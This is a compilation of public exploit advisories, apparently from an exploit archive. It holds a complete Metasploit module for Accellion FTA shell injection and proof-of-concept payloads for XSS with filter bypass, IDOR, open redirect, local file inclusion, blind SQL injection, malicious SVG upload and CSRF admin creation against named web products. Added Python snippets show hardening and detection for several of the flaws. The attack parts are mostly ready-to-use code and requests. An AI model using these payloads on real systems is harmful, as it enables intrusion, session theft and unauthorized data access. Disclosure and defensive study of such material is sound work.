Severity Level:
================
Med
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution',
'Description' => %q{
This module exploits a metacharacter shell injection vulnerability in the Accellion
File Transfer appliance. This vulnerability is triggered when a user-provided
'oauth_token' is passed into a system() call within a mod_perl handler. This
module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include
'/seos/find.api', '/seos/put.api', and '/seos/mput.api'. This issue was confirmed on
version FTA_9_11_200, but may apply to previous versions as well. This issue was
fixed in software update FTA_9_11_210.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://r-7.co/R7-2015-08'],
['CVE', '2015-2857']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet',
}
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 10 2015'
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class)
end
def check
uri = '/tws/getStatus'
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'transaction_id' => rand(0x100000000),
'oauth_token' => 'invalid'
}})
unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/
return Exploit::CheckCode::Safe
end
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'transaction_id' => rand(0x100000000),
'oauth_token' => "';echo '"
}})
unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
return Exploit::CheckCode::Safe
end
Msf::Exploit::CheckCode::Vulnerable
end
def exploit
# The token is embedded into a command line the following:
# `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;
token = "';#{payload.encoded};echo '"
uri = '/tws/getStatus'
# Other exploitable URLs:
# * /seos/find.api (works with no other changes to this module)
# * /seos/put.api (requires some hoop jumping, upload)
# * /seos/mput.api (requires some hoop jumping, token && upload)
print_status("Sending request for #{uri}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'transaction_id' => rand(0x100000000),
'oauth_token' => token
}})
if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
print_status("Valid response received...")
else
if res
print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
else
print_error("No reply received from the target")
end
end
handler
end
end
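The quoting flaw named in the module's comment, next to a hardened form, as an added example that is not Accellion's or Metasploit's code. The 32-hex-digit token format is an assumption drawn from the "MD5 token is invalid" response, and the function names and the sample aid/scope values are hypothetical.

```python
import re
import shlex

# Command template quoted in the module's comment (aid, token, scope interpolated).
TEMPLATE = ("/opt/bin/perl /home/seos/system/call_webservice.pl {aid} "
            "oauth_ws.php verify_access_token '{token}' '{scope}'")

# Assumption: a legitimate token is an MD5 hex digest (32 hex characters).
TOKEN_RE = re.compile(r"[0-9a-fA-F]{32}")


def shell_tokens(command):
    """Tokenise a command line the way a POSIX shell would, keeping ';' separate."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


def vulnerable_command(aid, token, scope):
    """Vulnerable pattern: untrusted token placed inside single quotes in a shell string."""
    return TEMPLATE.format(aid=aid, token=token, scope=scope)


def splits_command(aid, token, scope):
    """True when the interpolated token introduces a shell command separator."""
    return ";" in shell_tokens(vulnerable_command(aid, token, scope))


def is_valid_token(token):
    """Allow-list check: accept only the expected token shape."""
    return bool(TOKEN_RE.fullmatch(token))


def hardened_argv(aid, token, scope):
    """Hardened pattern: validate, then build an argv list that never reaches a shell."""
    if not is_valid_token(token):
        raise ValueError("oauth_token rejected: not a 32-character hex string")
    return ["/opt/bin/perl", "/home/seos/system/call_webservice.pl", str(aid),
            "oauth_ws.php", "verify_access_token", token, scope]


if __name__ == "__main__":
    probe = "';echo '"      # the check() probe from the module above
    good = "0" * 32         # constructed sample token
    print(splits_command(1, probe, "fta"))
    print(splits_command(1, good, "fta"))
    print(hardened_argv(1, good, "fta"))
```

The same is_valid_token() check can be run over logged oauth_token values to flag requests that do not match the expected shape.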
# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE-2021-34370
================================================================
Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
================================================================
================================================================
Request Headers start
================================================================
GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Headers end
================================================================
================================================================
Response Headers start
================================================================
HTTP/1.1 200 OK
Connection: close
Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter
X-XSS-Protection: 0
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 73
Date: Tue, 08 Jun 2021 10:41:59 GMT

<script type='text/javascript'>document.location=''^alert`1`^''</script>
================================================================
Response Headers end
================================================================
Payload: %27^alert`1`^%27
For open redirect, replace the payload with a valid website.
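The response above places successURL unescaped inside a JavaScript string literal. One way to build that redirect safely, as an added example that is not Accela's code: the allow-listed host, the fallback target and the function names are hypothetical.

```python
import json
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"portal.example.org"}   # hypothetical allow-list of redirect hosts
DEFAULT_TARGET = "/"                     # hypothetical fallback after logout


def safe_target(success_url):
    """Return success_url only if it is a same-site path or an allow-listed https URL."""
    # Browsers strip control characters and treat '\' as '/', so refuse both.
    if any(ord(c) < 0x20 or c == "\\" for c in success_url):
        return DEFAULT_TARGET
    try:
        parts = urlsplit(success_url)
    except ValueError:
        return DEFAULT_TARGET
    if not parts.scheme and not parts.netloc:
        # Relative reference: exactly one leading slash ("//host" is another site).
        if success_url.startswith("/") and not success_url.startswith("//"):
            return success_url
        return DEFAULT_TARGET
    if parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS:
        return success_url
    return DEFAULT_TARGET


def js_string(value):
    """Serialise value as a JavaScript string literal that is safe inside <script>."""
    literal = json.dumps(value)          # escapes quotes, backslashes, non-ASCII
    return (literal.replace("<", "\\u003c").replace(">", "\\u003e")
                   .replace("&", "\\u0026").replace("'", "\\u0027"))


def logout_redirect(success_url):
    """Build the redirect snippet with a validated, escaped target."""
    return ("<script type='text/javascript'>document.location="
            + js_string(safe_target(success_url)) + "</script>")


if __name__ == "__main__":
    print(logout_redirect("'^alert`1`^'"))            # decoded payload from above
    print(logout_redirect("https://evil.example/"))   # constructed off-site target
    print(logout_redirect("/portal/home"))            # constructed same-site path
```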
# Exploit Title: Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
# Exploit Author: Abdulazeez Alaseeri
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Tested on: JBoss server/windows
# Type: Web App
# Date: 06/07/2021
# CVE: CVE-2021-33904
================================================================
Accela Civic Platform Cross-Site-Scripting <= 21.1
================================================================
================================================================
Request Headers start
================================================================
GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1
Host: Hidden for security reasons
Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Headers end
================================================================
================================================================
Response Headers start
================================================================
HTTP/1.1 200 OK
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure
Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure
Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure
X-XSS-Protection: 0
Pragma: No-cache
Date: Sun, 06 Jun 2021 18:34:38 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13222
================================================================
Response Headers end
================================================================
You can notice that the parameter "servProvCode" is vulnerable to XSS.
Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9
# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE: CVE-2021-34369
================================================================
Accela Civic Platform Insecure Direct Object References <= 21.1
================================================================
This vulnerability allows authenticated attackers to view other users' data by manipulating the value of contactSeqNumber
================================================================
Request Headers start
================================================================
GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Headers end
================================================================
================================================================
Response Headers start
================================================================
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure
Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure
Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure
Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure
X-XSS-Protection: 0
Pragma: No-cache
X-UA-Compatible: IE=EDGE
Date: Wed, 09 Jun 2021 04:09:40 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98126
================================================================
Response Headers end
================================================================
The contactSeqNumber value can be changed to return valid information about another user, which indicates it is vulnerable to IDOR.
source: https://www.securityfocus.com/bid/61801/info
ACal is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input before being used to include files.
An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks.
ACal 2.2.6 is vulnerable; other versions may also be affected.
http://www.example.com/calendar/embed/example/example.php?view=../../etc/passwd%00
source: https://www.securityfocus.com/bid/49442/info
ACal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
ACal 2.2.6 is vulnerable; other versions may also be affected.
http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script>
# Exploit Title: Academy-LMS 4.3 - Stored XSS
# Date: 19/12/2020
# Vendor page: https://academy-lms.com/
# Version: 4.3
# Tested on Win10 and Google Chrome
# Exploit Author: Vinicius Alves
# XSS Payload: </script><svg onload=alert();>
1) Access LMS and log in to admin panel
2) Access courses page
3) Open course manager and SEO menu
4) Paste the XSS Payload tag and Submit
5) Access the course page on frontend
6) Triggered!
# Exploit Title: Academy LMS 6.2 - SQL Injection
# Exploit Author: CraCkEr
# Date: 29/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4974
# CWE: CWE-89 / CWE-74 / CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data, and crashing the application or making it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /academy/tutor/filter
GET parameter 'price_min' is vulnerable to SQL Injection
GET parameter 'price_max' is vulnerable to SQL Injection
https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0
---
Parameter: price_min (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0
Parameter: price_max (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0
---
[-] Done
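How the price_min and price_max bounds can be handled so that input like the payloads above never reaches the SQL text, plus a log check for non-numeric bounds. This is an added example, not Academy LMS code: it uses SQLite in place of the application's MySQL, and the table, columns and function names are hypothetical.

```python
import re
import sqlite3
from urllib.parse import parse_qs

PRICE_RE = re.compile(r"[0-9]{1,7}(?:\.[0-9]{1,2})?")   # plain decimal, nothing else
PRICE_PARAMS = ("price_min", "price_max")


def parse_price(raw, default):
    """Return the bound as a float, or raise ValueError for non-numeric input."""
    if raw is None or raw == "":
        return default
    if not PRICE_RE.fullmatch(raw):
        raise ValueError("price bound must be a plain decimal number")
    return float(raw)


def filter_tutors(conn, params):
    """Hardened filter: validated bounds are bound as parameters, never concatenated."""
    low = parse_price(params.get("price_min"), 0.0)
    high = parse_price(params.get("price_max"), 9999999.99)
    rows = conn.execute(
        "SELECT name FROM tutors WHERE price BETWEEN ? AND ? ORDER BY name",
        (low, high)).fetchall()
    return [name for (name,) in rows]


def suspicious_price_params(query_string):
    """Detection: price parameters in a logged query string that are not numeric."""
    values = parse_qs(query_string, keep_blank_values=True)
    return [p for p in PRICE_PARAMS
            if any(v and not PRICE_RE.fullmatch(v) for v in values.get(p, []))]


def demo_db():
    """Constructed sample data (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tutors (name TEXT, price REAL)")
    conn.executemany("INSERT INTO tutors VALUES (?, ?)",
                     [("Ana", 15.0), ("Ben", 40.0), ("Cy", 25.0)])
    return conn


# Query string from the advisory above, as it would appear in an access log.
LOGGED = ("searched_word=&searched_tution_class_type[]=1"
          "&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9"
          "&searched_price_type[]=hourly&searched_duration[]=0")

if __name__ == "__main__":
    print(filter_tutors(demo_db(), {"price_min": "10", "price_max": "30"}))
    print(suspicious_price_params(LOGGED))
```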
# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 05/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://academylms.net/
# Software Link: https://demo.academylms.net/
# Version: 6.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Allows an attacker to upload malicious files, such as Stored XSS, onto the server
## Steps to Reproduce:
1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
-----------------------------------------------------------
POST /wp-admin/async-upload.php HTTP/2
-----------------------------------------------------------
Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by CraCkEr");
</script>
</svg>
-----------------------------------------------------------
6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
8. Access your Uploaded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg
[-] Done
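One way to screen an avatar upload like the one in the steps above before it is stored and served, as an added example that is not Academy LMS code. The function names are hypothetical and the sample files are constructed; the first mirrors the structure of the upload shown above.

```python
import xml.etree.ElementTree as ET

ACTIVE_ELEMENTS = {"script", "foreignobject"}   # elements that can carry script or HTML


def local_name(qualified):
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1].lower()


def svg_findings(data):
    """Return reasons an uploaded SVG must not be stored and served as an image."""
    if b"<!ENTITY" in data:
        # Coarse pre-parse check: refuse entity declarations (entity-expansion input).
        return ["entity declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    findings = []
    for element in root.iter():
        tag = local_name(element.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append("<%s> element" % tag)
        for name, value in element.attrib.items():
            attr = local_name(name)
            if attr.startswith("on"):
                findings.append("%s handler on <%s>" % (attr, tag))
            elif attr == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript: href on <%s>" % tag)
    return findings


# Constructed samples.
UPLOADED = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
  <script type="text/javascript">alert(1);</script>
</svg>"""
CLEAN = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""
HANDLER = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="init()"/>"""

if __name__ == "__main__":
    for sample in (UPLOADED, CLEAN, HANDLER):
        print(svg_findings(sample))
```

An upload is accepted only when svg_findings() returns an empty list; an avatar endpoint that has no need for vector images can instead refuse SVG outright.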
# Exploit Title: Academy LMS 6.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 22/07/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Version: 6.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4119
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send the victim a link containing a malicious URL in an email or instant message
and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /academy/home/courses
GET parameter 'query' is vulnerable to XSS
https://website/academy/home/courses?query=[XSS]
Path: /academy/home/courses
GET parameter 'sort_by' is vulnerable to XSS
https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]
XSS Payloads (Blocked) :
<script>alert(1)</script>
ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd
XSS Payload Bypass Filter :
cplvz"><img src=a onerror=alert(1)>fk4ap
[-] Done
# Exploit Title: Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://geoffpartridge.net/
# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
# Version: 7.0a-7.0b
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Description
# New admin can be added..
http://192.168.1.27/[PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb
GET [PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 01:10:29 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 910
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
/* `exploitdb`.`ms_user` */
$ms_user = array(
array('use_id' => '1testdb','use_name' => '1testdb','rol_id' => 'ADMIN','pwd' => '*6CC4E8CFFEAF202D7475BC906612F9A29A9C8117')
);
#